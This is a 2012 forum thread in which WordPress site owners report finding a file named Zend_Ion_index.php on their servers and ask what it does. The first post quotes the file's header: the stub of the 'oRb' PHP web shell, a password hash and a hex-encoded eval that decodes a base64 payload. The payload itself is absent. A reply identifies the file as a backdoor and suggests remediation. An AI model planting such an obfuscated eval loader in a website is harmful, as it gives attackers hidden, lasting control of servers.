Zend_Ion_Index.Php in Server (wordpress)

Discussion in 'Security' started by Nystul, Feb 7, 2012.

  1. #1
    I checked my WordPress servers daily and found this newly updated file, Zend_Ion_index.php. I deleted it.

    Just wondering, what does this do? I ask so that I can further check whether my files are infected.
    I changed my FTP password and did a scan on the PC already.
    I found several other sites online infected with this too. It seems to open a password code thing to change the files on the server?

    <?PHP # Web Shell by oRb
    $auth_pass = "439b9c85f0bc1db31c288d84a04fdb8a";
    $color = "#df5";
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    $o = 
     
    ;eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B"); 
    ?>
    
    Nystul, Feb 7, 2012 IP
  2. HostingLynx

    #2
    That is a PHP-based "shell". It allows a hacker to have access to your files and the server your website is hosted on. Generally people put up a "shell" so that if you fix the original way they hacked your website they will still have access so they can gain access in the future. It appears that they have encoded the actual code for the shell so as to avoid server antiviruses. Smart move removing that. You should check your logs and figure out how it got there in the first place to avoid it happening again. You also might want to change your administrator password.
     
    HostingLynx, Feb 7, 2012 IP
  3. tRiTiO

    #3
    Hello:

    I found the same file on my server, "Zend_Ion_Index.Php". The account with this file is empty, not related to a WordPress installation. If you search Google for this file, a lot of compromised sites appear.

    I don't know the vulnerability yet. Maybe PHP 5.3.9, because the file was created before an update to 5.3.10...

    Please, if you have more information, post it.

    Thank you very much.
     
    tRiTiO, Feb 10, 2012 IP